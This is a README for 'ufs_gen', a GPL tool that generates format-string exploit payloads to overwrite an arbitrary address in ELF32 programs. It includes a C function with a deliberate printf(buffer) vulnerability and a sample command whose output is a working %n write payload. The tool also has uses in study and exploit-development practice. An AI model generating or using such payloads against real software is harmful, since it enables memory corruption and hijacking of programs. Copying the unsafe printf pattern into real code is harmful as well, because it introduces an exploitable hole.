summaryrefslogtreecommitdiff
path: root/README
blob: b2d96797b6915241c3461d9d58b8d556fb4d5cbf (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
ufs_gen
=======

This software allows you to generate a payload which may override an address
with the value of your choice.

The syntax is quite simple:

There are three parameters needed for the program to run correctly.

stackidx: this parameter specifies how many dwords you need to access the
beginning of your buffer (or payload).

override: the address to override

with: the value to inject at the address overriden

This software is intended to work with an ELF32 generated by a typical code.

example:

int function(const char *payload)
{
    char buffer[BUFSIZ];

    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';

    printf(buffer);

    return 0;
}

The support of ELF64 and other formats is intended but not written yet.
Although the option 'addrsize' might already be used to specify if an address
is not 4 bytes long, there is very few chances that it would work correctly.

The support of printf(payload) directly (i.e. without a temporary buffer) is 
also planned.

Example
=======

user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n

License
=======

This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.